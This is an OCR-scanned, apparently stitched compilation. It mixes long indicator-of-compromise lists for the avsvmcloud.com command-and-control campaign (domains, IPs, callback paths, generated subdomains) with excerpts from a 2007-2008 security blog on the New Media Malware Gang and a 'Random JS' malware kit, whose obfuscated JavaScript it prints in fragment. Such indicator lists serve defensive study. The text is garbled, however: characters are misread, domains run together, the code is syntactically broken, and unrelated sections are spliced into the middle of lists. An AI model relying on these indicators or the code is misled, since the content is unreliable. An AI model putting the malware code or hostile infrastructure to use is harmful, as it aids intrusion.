cl5abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 
Primary C &C domain known to have participated in the campaign: 
hxxp://avsvmcloud.com 

Related malicious C &C server IPs known to have participated in the campaign: 
hxxp://digitalcollege.com 

hxxp://virtualdataserver.com 

hxxp://avsvmcloud.com 

hxxp://deftsecurity.com 

hxxp://freescanonline.com 

hxxp://thedoccloud.com 

hxxp://digitalcollege.org 

hxxp://globalnetworkissues.com 

hxxp://kubecloud.com 

hxxp://Icomputers.com 

hxxp://seobundlekit.com 
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hxxp://solartrackingsystem.net 
hxxp://virtualwebdata.com 
hxxp://webcodez.com 
hxxp://websitetheme.com 
hxxp://highdatabase.com 
hxxp://incomeupdate.com 
hxxp://databasegalore.com 
hxxp://panhardware.com 
hxxp://zupertech.com 

Sample malicious IPs known to have participated in the campaign: 
13.59.205.66 

54.193.127.66 

54.215.192.52 

34.203.203.23 

139.99.115.204 

5.252.177.25 

5.252.177.21 

204.188.205.176 

51.89.125.18 

167.114.213.199 

Sample C &C phone back URL structure: 
swip/upd/ 

swip/Events 

swip/Upload.ashx 


Sample automatically generated C &C server host names mimicking Amazon’s AWS infrastruc- 
ture: 


0-210.avsvmcloud.com 
0-210.avsvmcloud.com 
Olu3n3ssi6tak4sbr6i0oe2hO0irt.appsync-api.eu-west-1.avsvmcloud.com 
Od7ic65pbh3ppg43hg04hgg.appsync-api.us-east-2.avsvmcloud.com 
Oefb5shqiduerrdta8r4mlf.appsync-api.us-west-2.avsvmcloud.com 
Ogktogjb0j2d820bjpho1160212eul.appsync-api.eu-west-1.avsvmcloud.com 
Ou82ehpcchj6kud5i6ir.appsync-api.us-east-1.avsvmcloud.com 
102-203.avsvmcloud.com 
10pvtr90165020ehjlos4bp.appsync-api.us-east-1.avsvmcloud.com 
11673.avsvmcloud.com 
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12127.avsvmcloud.com 

13316.avsvmcloud.com 

139113.avsvmcloud.com 

141-5.avsvmcloud.com 

152-167.avsvmcloud.com 
15906vljjpul0len87gs4bi.appsync-api.us-east-1.avsvmcloud.com 
17-155.avsvmcloud.com 

17914.avsvmcloud.com 

182-7.avsvmcloud.com 

18bc.avsvmcloud.com 

1953e.avsvmcloud.com 
1Lbaoro2ql8ffhm9c003u9drpOfeaaso.appsync-api.us-east-2.avsvmcloud.com 
lLemfcomhibu6o0re8mccm.appsync-api.us-east-2.avsvmcloud.com 
Lhn7|jmgv60gah2hvgc72bn.appsync-api.us-west-2.avsvmcloud.com 
ljbensvv3uifqhvdu6fsoirOcunO0tu6f.appsync-api.eu-west-1.avsvmcloud.com 
1po404féi8av0keemgue.appsync-api.us-west-2.avsvmcloud.com 
1q4lfr2noflg8he8k6jc.appsync-api.us-west-2.avsvmcloud.com 
211d.avsvmcloud.com 

22693.avsvmcloud.com 

237-209.avsvmcloud.com 

29-25.avsvmcloud.com 

2eee3.avsvmcloud.com 
2rsajlpphscv9vsdO0ie2h.appsync-api.eu-west-1.avsvmcloud.com 
2tjiggm4k2cp45Ins3kfo9f.appsync-api.us-west-2.avsvmcloud.com 
2u19vtOn04g4p2cu609b.appsync-api.us-west-2.avsvmcloud.com 
31dd0.avsvmcloud.com 

34598.avsvmcloud.com 
3511838286pk101378932910720.avsvmcloud.com 
35667.avsvmcloud.com 

373571.avsvmcloud.com 

37aab.avsvmcloud.com 

38581.avsvmcloud.com 

39384.avsvmcloud.com 

39932.avsvmcloud.com 


3b54f.avsvmcloud.com 
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88.255.94.250/s2/un.php 


And as I’ve already pointed out in a previous post, 88.255.94.250 is the [4]New Media 
Malware Gang. Moreover, next to m.exe and d.exe with an over 50 % detection rates, 200.exe 
is impressively detected by one anti virus vendor only : 


Detection rate : 1/32 (3.13 %) 

File size: 33280 bytes 

MD5: 9bf9265df5dea81135355d161f3522be 

SHA1: 44cdcaf5e8791e10506e3343d73a2993511fa91f 


Further continuing this assessment, firewalllab.cn (203.117.111.106) also responds to 
aero4.cn, and is hosted at AS4657 STARHUBINTERNET AS Starhub Internet Pte Ltd 31, Kaki 
Bukit Rd 3 SINGAPORE (previously known as CyberWay Pte Ltd). Even more interesting is 
the fact that 203.117.111.106 is also responding to known New Media Malware Gang domains : 


businesswr.cn 
fileuploader.cn 
firewalllab.cn 
otmoroski.cn 
otmoroski.info 
security4u.cn 
tdds.ru 
traffshop.ru 
x-victory.ru 


Furthermore, 203.117.111.106 seems to have made an appearance at otrix.ru, where in 
between the obfuscation an IFRAME loads to 58.65.233.97/forum.php, where two more get 
loaded 4qobj63z.tarog.us/tds/in.cgi?14; 4qobj63z.tarog.us/tds/in.cgi?15. Deja vu, again, 
again and again - 4qobj63z.tarog.us was among the domains used in the [5]malware em- 
bedded attack again the French government’s site related to Lybia, and there | made the 
connection with the New Media Malware Gang for yet another time. 


There’s indeed a connection between the RBN, Storm Worm and the The New Media 
malware gang. The malware gang is either a customer of the RBN, partners with the RBN 
sharing know-how in exchange for infrastructure on behalf of the RBN, or RBN’s actual opera- 
tional department. Piece by piece and an ugly puzzle picture appears [6]thanks to everyone 
monitoring the RBN that is still 100 % operational. 


. http://ddanchev. blogspot .com/2007/11/detecting-and-blocking-russian-business. htm 


1 
2. http: //ddanchev. blogspot .com/2007/11/new-media-malware-gang. htm 

3. http: //ddanchev. blogspot .com/2007/12/new-media-malware-gang-part-two.htm 
4. http://ddanchev. blogspot .com/2007/12/new-media-malware-gang-part-two.htm 


. http: //ddanchev.blogspot.com/2007/12/have-your-malware-in-timely-fashion.html 


. http://www.avertlabs.com/research/blog/index . php/2008/01/09/the-russian-business-network-is-on-tenterhook 
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3caio2reirrt308g1i3u662eouiIr60ee.appsync-api.eu-west-1.avsvmcloud.com 
3k60kolor6ca8hni2gagded.appsync-api.us-east-1.avsvmcloud.com 
3kt67raeldid7952h7o0s.appsync-api.eu-west-1.avsvmcloud.com 
3nkvfjeskpvcr55i512jpei.appsync-api.us-east-1.avsvmcloud.com 
3r143fflujchadaeuvih2coloipOtvri.appsync-api.us-west-2.avsvmcloud.com 
3t3ju7e82tm3ss5nt6sjbq5.appsync-api.us-east-1l.avsvmcloud.com 
41641670c7660528296245.avsvmcloud.com 

417.avsvmcloud.com 
A4li8tp255lai4b4frvrsd1f6O0be2h.appsync-api.us-east-2.avsvmcloud.com 
42111.avsvmcloud.com 

456qipainiuniuzuobiqi.avsvmcloud.com 

4699c.avsvmcloud.com 

48362.avsvmcloud.com 

48745.avsvmcloud.com 
4a7erultakubrjcg3bh6.appsync-api.us-west-2.avsvmcloud.com 
4ca06.avsvmcloud.com 
4e1rk8leu3u8qh6unoffm01.appsync-api.eu-west-1.avsvmcloud.com 
4f05d.avsvmcloud.com 
Angifh8nke84bmcpoi9h.appsync-api.us-west-2.avsvmcloud.com 
500055.avsvmcloud.com 

51657.avsvmcloud.com 

51661.avsvmcloud.com 

51910.avsvmcloud.com 

51b2e.avsvmcloud.com 

51b43.avsvmcloud.com 

52465.avsvmcloud.com 

53ce7.avsvmcloud.com 

54048.avsvmcloud.com 
546r5mep3l3o0kfd1lg6hqii0.appsync-api.us-west-2.avsvmcloud.com 
55450.avsvmcloud.com 
55bpo8kbheeprp43lgno.appsync-api.eu-west-1.avsvmcloud.com 
56ab2.avsvmcloud.com 

56b17.avsvmcloud.com 

56didi.avsvmcloud.com 


571a7.avsvmcloud.com 
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572df.avsvmcloud.com 


57f2bohvkl4kd12guedoe2sd00e2h.appsync-api.us-east-1.avsvmcloud.com 


58142.avsvmcloud.com 

593713.avsvmcloud.com 
5actq7llldscmug5qj34o0v5.appsync-api.us-east-1.avsvmcloud.com 
5dd58.avsvmcloud.com 

5e376.avsvmcloud.com 

5j3bohfh57 0tffogu30c2st.appsync-api.eu-west-1.avsvmcloud.com 
61718.avsvmcloud.com 

61718.avsvmcloud.com 

619c4.avsvmcloud.com 
62dof4hecdqeep883onlf8v.appsync-api.eu-west-1.avsvmcloud.com 
64-245.avsvmcloud.com 

646fa.avsvmcloud.com 

64929.avsvmcloud.com 

66.avsvmcloud.com 

66.avsvmcloud.com 

66839.avsvmcloud.com 

67e72.avsvmcloud.com 

68e6e.avsvmcloud.com 
6a57jk2bald9keg15cbg.appsync-api.eu-west-2.avsvmcloud.com 
6a7d9.avsvmcloud.com 

6cb6e.avsvmcloud.com 

6d6d5.avsvmcloud.com 

6f01f.avsvmcloud.com 


6f4d7.avsvmcloud.com 


6mmkasffpr3avsbhd18ak2o0bh.appsync-api.eu-west-1.avsvmcloud.com 


72kdcpuvhkd43bp5fjj8.appsync-api.us-west-2.avsvmcloud.com 


73pbuu007mt487gjosi302eu116fv630.appsync-api.us-west-2.avsvmcloud.com 


74e01.avsvmcloud.com 
75565.avsvmcloud.com 
75j470a21jk7eu2enlmaq6p.appsync-api.eu-west-1.avsvmcloud.com 
77885.avsvmcloud.com 
77dede.avsvmcloud.com 
793337.avsvmcloud.com 
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79655.avsvmcloud.com 

79a74.avsvmcloud.com 

79b0a.avsvmcloud.com 

7b646a.avsvmcloud.com 
7g6k6oji1liv7md2iftjO0d6roh.appsync-api.eu-west-1.avsvmcloud.com 
7qOum2svrcnvhghla89m.appsync-api.us-east-2.avsvmcloud.com 
7sbvaemscsOmc925tb99.appsync-api.us-east-2.avsvmcloud.com 
7sbvaemscsOmc925tb99.appsync-api.us.west-2.avsvmcloud.com 
7u3200mé6ureci8h5eo06k.appsync-api.us-west-2.avsvmcloud.com 
7ubs5cuno00863h59ctd.appsync-api.us-east-1.avsvmcloud.com 
7ucbup4i2tk209h53jlc.appsync-api.eu-west-1.avsvmcloud.com 
82054.avsvmcloud.com 

826b.avsvmcloud.com 

82c8e.avsvmcloud.com 
82d205uf3hpfOmul06ccr3h.appsync-api.us-east-2.avsvmcloud.com 
84460.avsvmcloud.com 

84c95.avsvmcloud.com 

857aa.avsvmcloud.com 

88-43.avsvmcloud.com 
89r2b76kKcjvn6jn3073j.appsync-api.us-west-2.avsvmcloud.com 
8bbtupp45I82caokOOmukbb40g5t0ko4.appsync-api.us-west-2.avsvmcloud.com 
8bd6f.avsvmcloud.com 
8d06k1cpj20i525e870d.appsync-api.us-west-2.avsvmcloud.com 
8fa.avsvmcloud.com 
8idcagkrbdu99aujh2stuv522n60te2h.appsync-api.us-east-2.avsvmcloud.com 
80m0atg5lrrrutmjiifO2rnf.appsync-api.us-east-2.avsvmcloud.com 
8vk8mfis8adnvfij32 Lhuv60ie2h.appsync-api.us-west-2.avsvmcloud.com 
9067c.avsvmcloud.com 

915f9.avsvmcloud.com 

94635.avsvmcloud.com 
950s4t2590hhsd9237ieekk.appsync-api.us-east-1l.avsvmcloud.com 
9631.avsvmcloud.com 

97717.avsvmcloud.com 

98798.avsvmcloud.com 


99-64.avsvmcloud.com 
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9c9fplgoeb79qnul00nukimb71jt6dri.appsync-api.us-east-1.avsvmcloud.com 
9e3a60u2ig164aqunc8e3kf.appsync-api.us-east-2.avsvmcloud.com 
9f5m1cO7m8d6kKicm1n8t7los5j0e92bl.appsync-api.us-west-2.avsvmcloud.com 
9jgtrushj3bhgtmkd14qt6007g.appsync-api.eu-west-1.avsvmcloud.com 
9pro7bp8f96gi84ongeihnr.appsync-api.us-west-2.avsvmcloud.com 
a0foad4hkhde96kf71pf.appsync-api.us-east-1.avsvmcloud.com 
aOom869ii8pt4rkfmga8.appsync-api.us-east-1.avsvmcloud.com 
a1632.avsvmcloud.com 


a26-67.avsvmcloud.coma20-65.avsvmcloud.comal11-64.avsvmcloud.coma4-65.avsvmcloud 
.comal-139.avsvmcloud.com 


a28mckvpndt1r605f89u.appsync-api.us-west-2.avsvmcloud.com 
a6jgrigfej 7653mo2h.appsync-api.eu-west-1.avsvmcloud.com 
accounting-dep-10.avsvmcloud.com 
acmilanvsmanlian.avsvmcloud.com 
ad5o0okf2mgf9bkOhclb5.appsync-api.us-west-2.avsvmcloud.com 
ag200.avsvmcloud.com 
aomenbocaixingchengyuanyin.avsvmcloud.com 
aopa.avsvmcloud.com 

api.us-west.2.avsvmcloud.com 
appsyc-api.us-east-2.avsvmcloud.com 
appsyc-api.us-west-2.avsvmcloud.com 
appsync-api.us.east-2.avsvmcloud.com 
appsync-api.us.west-2.avsvmcloud.com 
appsync.api.us-west.2.avsvmcloud.com 

as001.avsvmcloud.com 
asdasdas.appsync-api.eu-west-l.avsvmcloud.com 
ataraxia.avsvmcloud.com 
avsvmcloud.comal1-139.avsvmcloud.coma6-66.avsvmcloud.com 


avsvmcloud.comal1-64.avsvmcloud.coma4-65.avsvmcloud.comal1-139.avsvmcloud.coma6- 
66.avsvmcloud.com 


avsvmcloud.coma20-65.avsvmcloud.comal11-64.avsvmcloud.coma4-65.avsvmcloud.comal- 
139.avsvmcloud.com 


avsvmcloud.coma4-65.avsvmcloud.comal1-139.avsvmcloud.coma6-66.avsvmcloud.com 
avsvmcloud.coma6-66.avsvmcloud.com 

awwa.avsvmcloud.com 

bOkosh.avsvmcloud.com 
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bOkosh.avsvmcloud.com 

b8dd.avsvmcloud.com 

b990.avsvmcloud.com 
baijialeduboji.avsvmcloud.com 
baijialeshipinyouxiwangzhan.avsvmcloud.com 
bangfontchoti.avsvmcloud.com 
bckO0Olivdvhdg34sluees6bm91jha6b9.appsync-api.us-west-2.avsvmcloud.com 
bd32.avsvmcloud.com 

bhpb.avsvmcloud.com 
biboguojiyulechengshoucun.avsvmcloud.com 
bik3edrgv6mqs2|lphudvu2h01d60be2h.appsync-api.us-east-1.avsvmcloud.com 
bma.bhpb.avsvmcloud.com 
bocailuntanzenmeyangjieshaoxia.avsvmcloud.com 
bodogbogouzuixinyouhui.avsvmcloud.com 
bojiuyulechengkekaoma.avsvmcloud.com 
c25.avsvmcloud.com 

caarray.avsvmcloud.com 
caitongaibocailuntan789789com.avsvmcloud.com 
Ccangzhouluoweisheying.avsvmcloud.com 
caprice.avsvmcloud.com 
castelnuovo.avsvmcloud.com 
ceoguojiyulechang.avsvmcloud.com 
chengdumajiang.avsvmcloud.com 
cleat.avsvmcloud.com 
comal1-139.avsvmcloud.coma6-66.avsvmcloud.com 


comal11-64.avsvmcloud.coma4-65.avsvmcloud.comal-139.avsvmcloud.coma6-66.avsvmclo 
ud.com 


coma20-65.avsvmcloud.comal11-64.avsvmcloud.coma4-65.avsvmcloud.comal1-139.avsvmcl 
oud.coma6-66.avsvmcloud.com 


coma4-65.avsvmcloud.comal1-139.avsvmcloud.coma6-66.avsvmcloud.com 
coma6-66.avsvmcloud.com 
cvd4jt8jcfabtl7qvr0te2h.appsync-api.us-west-2.avsvmcloud.com 
d011l1dnfb56vtr2ivnpekd.appsync-api.us-west-2.avsvmcloud.com 
dazhongdianpingwangdiyongquan.avsvmcloud.com 
db6bhrtutb15ak8s5oshOtg2vr6nup0c.appsync-api.us-east-1.avsvmcloud.com 
db8f.avsvmcloud.com 
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dc117.avsvmcloud.com 

dc236.avsvmcloud.com 

delivery3.avsvmcloud.com 
dh3qv9246irl46v2gvghekl.appsync-api.us-east-1.avsvmcloud.com 
di27.avsvmcloud.com 
djt6nlioaej7hbvsds2nfeio2vOeervn.appsync-api.us-west-2.avsvmcloud.com 
dn69.avsvmcloud.com 
dnch48k39d42i6bpofeo.appsync-api.us-west-2.avsvmcloud.com 
dns117.avsvmcloud.com 

dongfangnibocaipingtai.avsvmcloud.com 

drose.avsvmcloud.com 

dxiqsu.avsvmcloud.com 

dyn76.avsvmcloud.com 

e08.avsvmcloud.com 
ecq6bapc3kndcvssfvoirn0tl2eul.appsync-api.eu-west-1.avsvmcloud.com 
educacion22.avsvmcloud.com 

educacion44.avsvmcloud.com 
ee8g64ccucl5jmanb6loo95.appsync-api.us-east-2.avsvmcloud.com 
eiptaf52enbqlvrt00qusd3e91ha003m.appsync-api.us-east-2.avsvmcloud.com 
e0m19828.avsvmcloud.com 

flb6.avsvmcloud.com 
f4hg6fee47g08dhgkccti29.appsync-api.us-west-2.avsvmcloud.com 
f7h9Ihphof50dmgtvri.appsync-api.us-east-1.avsvmcloud.com 
fOft4vV8fol8rnihpvlf144d.appsync-api.us-west-2.avsvmcloud.com 
fab6v6megqt03ua2j48il.appsync-api.us-east-1.avsvmcloud.com 
fd5g6l1lv5qsqpqv2i776gp2!.appsync-api.us-west-2.avsvmcloud.com 
feilvbinjiuzhoudaodaoyulecheng.avsvmcloud.com 
fengtianhuangguanyinxiangzenmeyang.avsvmcloud.com 
fgO0e9pttsfe55hstd14qt6007g.appsync-api.eu-west-1.avsvmcloud.com 
fot.avsvmcloud.com 
frn9hbfinvbm2Iruu6fsoirOeunOeu6f.appsync-api.us-east-2.avsvmcloud.com 
front9.avsvmcloud.com 

fxlet6.avsvmcloud.com 
gO090ivudeq131103af47.appsync-api.us-east-2.avsvmcloud.com 
g2cpxdevl1.ccbs.avsvmcloud.com 
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g2qogralmfqf5j312ma0r3f.appsync-api.us-east-1.avsvmcloud.com 
gaoerfuyulechenghuodongtuijian.avsvmcloud.com 


gb9gdii8ijeac8flv2s6rvvuvh60el2eu.appsync-api.us-east-1l.avsvmcloud.com 


gbac8esmt308n5evdul2uli2vriq2sj6.appsync-api.us-east-1.avsvmcloud.com 


gkqcj04nsv9419ofrvicdoi.appsync-api.us-west-2.avsvmcloud.com 


godps66fc4skvr0vds2nfeio2vOcervn.appsync-api.eu-west-1.avsvmcloud.com 


gpt01lu2srkveetifpft0dor.appsync-api.eu-west-1.avsvmcloud.com 
gqlh856599gqgh538acqn.appsyc-api.us-west-2.avsvmcloud.com 
gql1h856599gqh538acqn.appsync.api.us-west.2.avsvmcloud.com 
grczicak.avsvmcloud.com 
guanjunzugiujingliZ012hanhua.avsvmcloud.com 
guizuyulechengnoble.avsvmcloud.com 
hainandanzhoushuijinggongyulecheng.avsvmcloud.com 
haoboguojixinyuruhe.avsvmcloud.com 
hengdazuqiuxuexiaozhaosheng.avsvmcloud.com 
hengsaotianxiadaonanjiadian.avsvmcloud.com 

hhs9j 7ug65kqn99o0b15I.appsync-api.us-west-2.avsvmcloud.com 
hk14.avsvmcloud.com 
hlevrpfithlhndjw6jpvride3uLh6iun.appsync-api.us-east-1.avsvmcloud.com 
homeschooling.avsvmcloud.com 

homicide.avsvmcloud.com 

host-117-110.avsvmcloud.com 

host-141-132.avsvmcloud.com 

host-150-215.avsvmcloud.com 

host-184-74.avsvmcloud.com 

host-185-100.avsvmcloud.com 

host-203-187.avsvmcloud.com 

host-213-173.avsvmcloud.com 

host-217-225.avsvmcloud.com 

host-248-117.avsvmcloud.com 

host-3-114.avsvmcloud.com 

host-43-209.avsvmcloud.com 

host-6-36.avsvmcloud.com 

host-6-36.avsvmcloud.com 


host10-223.avsvmcloud.com 
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host170-118.avsvmcloud.com 

host171-245.avsvmcloud.com 

host2-238.avsvmcloud.com 

host244-206.avsvmcloud.com 

host245-88.avsvmcloud.com 

host59-247.avsvmcloud.com 

hpc20.avsvmcloud.com 
hqe4ujlikoncb9dnmcdebdv.appsync-api.us-west-2.avsvmcloud.com 
hrkdr8tvcir813 lveddocOgeu.appsync-api.us-east-2.avsvmcloud.com 
htf7s7t36jOlis4j2ckv.appsync-api.us-east-1.avsvmcloud.com 
httprjlt9fccqbhil8b6eoiunr1ts2fdObe2.appsync-api.us-west-2.avsvmcloud.com 
httprjlt9fccqbhi1l8b6eoiunrl1ts2fdObe2.appsync-api.us-west-2.avsvmcloud.com 
huangchengqipaiguanwang.avsvmcloud.com 
huangguanbeiyongxinwangzhi.avsvmcloud.com 
huangguandubodaji.avsvmcloud.com 
huangguandubodaji.avsvmcloud.com 
huarenziyouzuqiuba.avsvmcloud.com 

humle.avsvmcloud.com 
hvpgv9psvq02ffo77et.appsync-api.eu-west-1.avsvmcloud.com 
hvpgv9psvqO02ffo77et.appsync-api.eu-west-2.avsvmcloud.com 
i0us8169epgp643pgi4n24l.appsync-api.us-east-2.avsvmcloud.com 
i53jl69k1d79rsfo3fbs.appsync-api.us-west-2.avsvmcloud.com 
igkbetzhenrenyulecheng.avsvmcloud.com 
igkbetzhenrenyulecheng.avsvmcloud.com 
iglpfhonk9844bqweudhris20bovi.appsync-api.us-west-2.avsvmcloud.com 
invpgv9psvqO02ffo7 7et-appsync-api.us-east-2.avsvmcloud.com 
invpgv9psvqO02ffo7 7et.appsyc-api.us-east-2.avsvmcloud.com 
invpgv9psvgO02ffo7 7et.appsync-api.us.east-2.avsvmcloud.com 
infoport.avsvmcloud.com 

inkjam.avsvmcloud.com 

ip-116-177.avsvmcloud.com 

ip-132-124.avsvmcloud.com 

ip-146-190.avsvmcloud.com 

ip-148-64.avsvmcloud.com 

ip-17-99.avsvmcloud.com 
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ip-26-148.avsvmcloud.com 
ip-26-26.avsvmcloud.com 
ip-31-222.avsvmcloud.com 
ip-8-248.avsvmcloud.com 
ip-89-13.avsvmcloud.com 
ip204-103.avsvmcloud.com 
ip204-103.avsvmcloud.com 
ip8-251.avsvmcloud.com 
irlande.avsvmcloud.com 
iu2gusvhlae69v3g73vjr21.appsync-api.us-west-2.avsvmcloud.com 
jOls9u8pa67bkpj3ar9v.appsync-api.us-west-2.avsvmcloud.com 
j110.avsvmcloud.com 
j2omf6223b9qji818067i35.appsync-api.eu-west-1.avsvmcloud.com 
j7vptls5e80auanyO0Otudsrof5g2qofm.appsync-api.us-west-2.avsvmcloud.com 
jamesmclellan.avsvmcloud.com 
jcnfderl8kol508xu1lno08dszO0ie2h.appsync-api.us-west-2.avsvmcloud.com 
jdnodn2f0ppaqlsgfvi2 7qor.appsync-api.us-east-1.avsvmcloud.com 
jeu8dtsOuver99g84mhq.appsync-api.us-east-1.avsvmcloud.com 
jfx.avsvmcloud.com 
jinanbocaiwang.avsvmcloud.com 
jingcaizuqiu258.avsvmcloud.com 
jot17001vt7dht3x60t12eul.appsync-api.us-east-1.avsvmcloud.com 
k-decoration-com.avsvmcloud.com 
klkunp6spd8dmnhyiue07nrvwrsObe2h.appsync-api.us-west-2.avsvmcloud.com 
k4i7smfili0lkqv82b3dvgp.appsync-api.eu-west-1.avsvmcloud.com 
k5kcubuassl3alrf7gm3.appsync-api.eu-west-2.avsvmcloud.com 
k5kcubuassl3alrf7gm3.appsync-api.us-west-1.avsvmcloud.com 
k7yulecheng888.avsvmcloud.com 
kazb.avsvmcloud.com 
kokr1u9lbop7jisze2sdOtui3rvu3rul.appsync-api.eu-west-1.avsvmcloud.com 
kpsfqmhk138lbhv3ifjd9gd.appsync-api.eu-west-1.avsvmcloud.com 
l0aj4003egqo7 7ofhv3h.appsync-api.us-west-2.avsvmcloud.com 
1339oljiej7a67q00054anm45jjtkkom.appsync-api.eu-west-1.avsvmcloud.com 
I3lpO0o6e8qbkbgfzuvih2coloipO2vri.appsync-api.eu-west-1.avsvmcloud.com 
l4u9i3jpv8vm71381b40fj1.appsync-api.eu-west-1.avsvmcloud.com 

12651 


I8pouarem2ffephzuvih2coloipO0evri.appsync-api.us-west-2.avsvmcloud.com 
laddvmguartgcrimwgmo.avsvmcloud.com 
latinmusicadmin.avsvmcloud.com 
Id7t6jejnO09t8b3h3vvr.appsync-api.eu-west-1l.avsvmcloud.com 
leafuervsyamian.avsvmcloud.com 
Ihhhu8ilvobbkh73epijOd6g.appsync-api.eu-west-1.avsvmcloud.com 
liman.avsvmcloud.com 
liucaijigongzhuluntanxianggangliuhecaihaoma.avsvmcloud.com 
lol.appsync-api.eu-west-1.avsvmcloud.com 
lolcentre.avsvmcloud.com 
longhuyingxiongyinghuangguoji.avsvmcloud.com 
lunpandubojiqiaozenmewan.avsvmcloud.com 
ma4arOuaegpkmiugh60g.appsync-api.eu-west-1.avsvmcloud.com 
machine113.avsvmcloud.com 

maibaum.avsvmcloud.com 

mail0056.avsvmcloud.com 

mail7.avsvmcloud.com 

manamazu-net.avsvmcloud.com 
mangguogipaiyouxipingtai.avsvmcloud.com 
marcfaberblog.avsvmcloud.com 

matsudo.avsvmcloud.com 

mcdc.avsvmcloud.com 
mhdosoksaccf9sni9icp.appsync-api.eu-west-2.avsvmcloud.com 
mhtup38ep6apOguiegmm.appsync-api.us-west-2.avsvmcloud.com 
mag8rcsmt7vf8345ggj82.appsync-api.us-east-2.avsvmcloud.com 
mtilriia09pggfuu2jm8mah.appsync-api.eu-west-1.avsvmcloud.com 
mxb117.avsvmcloud.com 

mxbackupdf.avsvmcloud.com 

myanb13.avsvmcloud.com 

nanfeisaimahui.avsvmcloud.com 

nanna519.avsvmcloud.com 

net52.avsvmcloud.com 

net73.avsvmcloud.com 

node-104.avsvmcloud.com 


noticiasinusitadas.avsvmcloud.com 
12652 


4.1.8 The Random JS Malware Exploitation Kit (2008-01-16 00:06) 


var arg="rofambbj"; 


var MU = “http://" + document .location.hostname + "/" + arg; 
var MH = °°; 
var MUT = MU; 
For (i=8; i < MUT.length; i++) 
< 
var b = MUT.charCodeaAt (1); 
MH = MH + b.toString (16); 
> 
MH = MH.toUpperCase(); 
if (Math.round(MUT.length/2) t= (MUT.length/2)) 


{ 
HH += "OO"; 


var MR = °'; 
for (i=6; i < MH.length; i += 4) 


MR = MR + ‘Zu* + MH.substring(i+2, i+4%) + MH.substring(i, i+2); 


var MU2 = "\"" + MU ® Vrs 
var MR2 = "\"" + WR oe yet: 


The [1]Random JS infection kit as originally named [2]by Finjan, is perhaps the first publicly 
announced malicious innovation for 2008, in fact I’ve managed to obtain a copy of a sample .js 
and witness the filename change on the next request combined with complete disappearance 
of any .js on the third visit. Here’s some press coverage - "[3]Over 10,000 trusted websites 
infected by new Trojan toolkit" : 


"The random js attack is performed by dynamic embedding of scripts into a webpage. It pro- 
vides a random filename that can only be accessed once. This dynamic embedding is done in 
such a selective manner that when a user has received a page with the embedded malicious 
script once, it will not be referenced again on further requests. This method prevents detection 
of the malware in later forensic analyses." 


And several more articles - "[4]Hacking Toolkit Compromises Thousands Of Web Servers" ; 
"[5]Trojan toolkit infected 10000 Web sites in December" ; "[6]Legitimate sites serving up 
stealthy attacks". Compared to all of the malware embedded attacks during 2007 which were 
serving the malware from a secondary domain, as well as the exploits themselves, in attack 
technique is hosting everything on the infected domain. Sample random and local malware 
locations : 


bunburyymas.com/ihkxtmzl 
bunburyymas.com/odjiffkl 
techicorner.com/bcuoixaf 
otcash.com/ktehxwmj 
otcash.com/soqutkue 
otcash.com/bemkwijz 

Sample .js random filenames : 
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noticiasmundogaturro.avsvmcloud.com 
nqgb1in49f7lua9b5eo0j9bv0.appsync-api.us-east-1.avsvmcloud.com 
040eu5k14noejb8udbp6.appsync-api.eu-west-1.avsvmcloud.com 
oav39096aq2r6j8ncmolbq5.appsync-api.us-west-2.avsvmcloud.com 
obtl.avsvmcloud.com 
oeqoocOhrfrd6v8n63ttog1.appsync-api.eu-west-1.avsvmcloud.com 
office-sam-com.avsvmcloud.com 

omamicvcdabse.avsvmcloud.com 

pc3023.avsvmcloud.com 

pc33-164.avsvmcloud.com 

pc373.avsvmcloud.com 

pcn.bma.bhpb.avsvmcloud.com 

pcvv.avsvmcloud.com 

piccoli.avsvmcloud.com 
pjjl1sei1l23ggh3d18ak2obh.appsync-api.us-west-2.avsvmcloud.com 
pointsite.avsvmcloud.com 
psmcs2nqgglncébgfb4hrp1.appsync-api.us-west-2.avsvmcloud.com 
ptr229.avsvmcloud.com 
pufcarc4fcp4unbggo63rp7.appsync-api.us-west-2.avsvmcloud.com 
pvLlupo20nmhedd3003u9drpOfeaaso.appsync-api.us-east-1.avsvmcloud.com 
pyot.avsvmcloud.com 
q34clqm/73oovgli4d1lvtOodwi.appsync-api.us-east-2.avsvmcloud.com 
g4lhO3j33gjn6jajt6thf50.appsync-api.us-west-2.avsvmcloud.com 
q7vil9bhev6hv30500f4qoin5u5uq2i5.appsync-api.eu-west-1.avsvmcloud.com 
qa0qbbrgoOlulaagicrb.appsync-api.eu-west-1.avsvmcloud.com 
qci8ba4fgb6fjsq50054anm45jjtkkom.appsync-api.eu-west-1.avsvmcloud.com 
qgingdaoshishicaipingtai.avsvmcloud.com 
qishengyulechengdailiyongjin.avsvmcloud.com 
qarnso8v6é6jshsse5ds2nfeio2v0oervn.appsync-api.us-west-2.avsvmcloud.com 
r05irhbrtlbrhooijvs2.appsync-api.us-west-2.avsvmcloud.com 
r0033r5g4j30g3323vanesg.appsync-api.us-west-2.avsvmcloud.com 
rendahuazhiduchangpanguan.avsvmcloud.com 
rilg78gnu378q88600qusd3e91ha003m.appsync-api.eu-west-1.avsvmcloud.com 
rivendale.avsvmcloud.com 


rjd7alg94i5rjb65fgge.appsync-api.us-west-2.avsvmcloud.com 
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rkd21s71vd0h30ipjr8t.appsync-api.us-west-2.avsvmcloud.com 
rm202.avsvmcloud.com 
rmh284grq2i7pec51rwo0ce2h.appsync-api.us-east-1.avsvmcloud.com 
rttnxvdihamierdmizlw.avsvmcloud.com 

S50428331.avsvmcloud.com 
sa318ufuldollr7tpo3vm/7v.appsync-api.us-east-2.avsvmcloud.com 
sab2|5ha6vonk9l13m46.appsync-api.us-west-2.avsvmcloud.com 
sangpuduoliyavsguomi.avsvmcloud.com 
sanyayouhefaduchangma.avsvmcloud.com 
selba5qgtudvkr71mbd6.appsync-api.us-east-1.avsvmcloud.com 
shanghaishibohuiguanwang.avsvmcloud.com 
shangpingipaihaoma.avsvmcloud.com 
shiweizugiubocaigongsi.avsvmcloud.com 

shuangcai.avsvmcloud.com 

shuangsegqiukai2013035.avsvmcloud.com 

sigaedu.avsvmcloud.com 

silverghost.avsvmcloud.com 
sl1f8b320dnat5u662hrOmn2huov.appsync-api.us-west-2.avsvmcloud.com 
spcr-8.avsvmcloud.com 

spcr-8.avsvmcloud.com 
sq3té6ijm2r4etoll12mkb.appsync-api.eu-west-1.avsvmcloud.com 
sr8agq21lern6ni36jt60if60ee2h.appsync-api.eu-west-1.avsvmcloud.com 
srv030.avsvmcloud.com 
